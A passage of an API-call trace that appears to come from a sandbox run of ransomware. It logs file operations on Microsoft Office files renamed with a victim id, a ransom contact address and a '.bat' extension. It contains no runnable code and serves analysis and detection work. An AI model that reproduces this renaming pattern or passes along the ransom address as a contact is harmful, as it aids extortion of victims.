(normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.891] CloseHandle (hObject=0x51c) returned 1 [0166.892] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.892] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.892] CloseHandle (hObject=0x51c) returned 1 [0166.893] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.893] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GRAPH_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\graph_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.894] CloseHandle (hObject=0x51c) returned 1 [0166.895] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.896] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.896] CloseHandle (hObject=0x51c) returned 1 [0167.322] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.322] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.322] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.322] CloseHandle (hObject=0x51c) returned 1 [0167.324] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.324] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.324] CloseHandle (hObject=0x51c) returned 1 [0167.325] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.325] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.325] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.325] CloseHandle (hObject=0x51c) returned 1 [0167.360] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.360] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GROOVE_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\groove_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.361] CloseHandle (hObject=0x51c) returned 1 [0167.362] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.362] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVAC.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvac.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.362] CloseHandle (hObject=0x51c) returned 1 [0167.363] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.363] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVACDIFF.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvacdiff.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.363] CloseHandle (hObject=0x51c) returned 1 [0167.364] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.364] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.364] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\HVACDUCT.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\hvacduct.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.364] CloseHandle (hObject=0x51c) returned 1 [0167.366] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.366] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.366] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\INSTLIST.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\instlist.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.366] CloseHandle (hObject=0x51c) returned 1 [0167.367] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.367] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\INVENTRY.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\inventry.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.367] CloseHandle (hObject=0x51c) returned 1 [0167.369] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.369] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LGND.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lgnd.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.369] CloseHandle (hObject=0x51c) returned 1 [0167.370] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.370] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.370] CloseHandle (hObject=0x51c) returned 1 [0167.372] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.372] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.372] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.372] CloseHandle (hObject=0x51c) returned 1 [0167.373] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.373] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.373] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.373] CloseHandle (hObject=0x51c) returned 1 [0167.375] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.375] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.375] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.375] CloseHandle (hObject=0x51c) returned 1 [0167.376] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.376] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.377] CloseHandle (hObject=0x51c) returned 1 [0167.377] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.377] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.378] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_BASIC_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_basic_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.378] CloseHandle (hObject=0x51c) returned 1 [0167.378] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.379] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.379] CloseHandle (hObject=0x51c) returned 1 [0167.380] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.380] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.380] CloseHandle (hObject=0x51c) returned 1 [0167.381] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.381] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.381] CloseHandle (hObject=0x51c) returned 1 [0167.382] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.382] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.382] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.382] CloseHandle (hObject=0x51c) returned 1 [0167.383] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.383] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.383] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE.HXS.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online.hxs.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.383] CloseHandle (hObject=0x51c) returned 1 [0167.389] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.389] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_COL.HXC.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_col.hxc.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.389] CloseHandle (hObject=0x51c) returned 1 [0167.391] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.391] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_COL.HXT.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_col.hxt.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.391] CloseHandle (hObject=0x51c) returned 1 [0167.392] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.392] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.392] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.393] CloseHandle (hObject=0x51c) returned 1 [0167.393] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.393] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\LYNC_ONLINE_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\lync_online_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.597] CloseHandle (hObject=0x51c) returned 1 [0167.800] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.800] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ORGWIZ.VSL.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\orgwiz.vsl.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.800] CloseHandle (hObject=0x484) returned 1 [0167.877] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.878] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.878] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_F_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_f_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.878] CloseHandle (hObject=0x434) returned 1 [0167.878] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.879] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.879] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINPROJ_STD_K_COL.HXK.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winproj_std_k_col.hxk.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.879] CloseHandle (hObject=0x434) returned 1 [0167.880] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.880] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec0 | out: lpNewFilePointer=0x0) returned 1 [0167.880] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WINSCHD.VRD.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\winschd.vrd.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0167.880] CloseHandle (hObject=0x434) returned 1 [0167.884] 